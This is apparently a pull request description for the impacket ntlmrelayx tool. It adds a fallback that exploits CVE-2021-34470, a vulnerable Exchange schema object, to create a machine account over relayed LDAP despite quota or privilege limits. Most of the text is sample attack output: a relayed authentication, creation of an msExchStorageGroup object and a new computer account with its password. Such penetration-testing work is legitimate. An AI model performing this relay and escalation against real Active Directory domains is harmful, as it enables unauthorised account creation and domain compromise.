[ntlmrelayx] LDAP attack: bypass computer creation restrictions with CVE-2021-34470

[SAERXCIT]

Hi !

This PR completes the --add-computer ntlmrelayx attack to try to exploit CVE-2021-34470 to add a computer even if restrictions are in place (machine account quota, SeMachineAccountPrivilege).

More info in the accompanying blog post.

If creation of a machine account failed, ntlmrelayx will check if the vulnerable LDAP object exists within the schema, and if so create it under the relayed computer account, and then add the new computer under this object. The output will look like the following:

[*] Authenticating against ldaps://dc1.domain.local as domain.local\BORDEAUX$ SUCCEED 
[*] Assuming relayed user has privileges to escalate a user via ACL attack 
[*] Attempting to create computer in: CN=Computers,DC=DOMAIN,DC=LOCAL 
[-] Failed to add a new computer: {'result': 50, 'description': 'insufficientAccessRights', 'dn': '', 'message': '00000522: SecErr: DSID-0315381B, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0\n\x00', 'referrals': None, 'type': 'addResponse'}
[*] Fallback: attempting to exploit CVE-2021-34470 (vulnerable Exchange schema)
[*] Checking if `msExchStorageGroup` object exists within the schema and is vulnerable
[*] Object `msExchStorageGroup` exists and is vulnerable!
[*] Attempting to add new `msExchStorageGroup` object `LHHWRBAO` under `CN=BORDEAUX,OU=Workstations,DC=DOMAIN,DC=LOCAL`
[*] Added `msExchStorageGroup` object at `CN=LHHWRBAO,CN=BORDEAUX,OU=Workstations,DC=DOMAIN,DC=LOCAL`. DON'T FORGET TO CLEANUP
[*] Attempting to create computer in `CN=LHHWRBAO,CN=BORDEAUX,OU=Workstations,DC=DOMAIN,DC=LOCAL`
[*] Adding new computer with username: ALMONDMACHINE$ and password: ~N7x6hr*hl]_>*_ result: OK

Credits to James Forshaw for the research.

Cheers !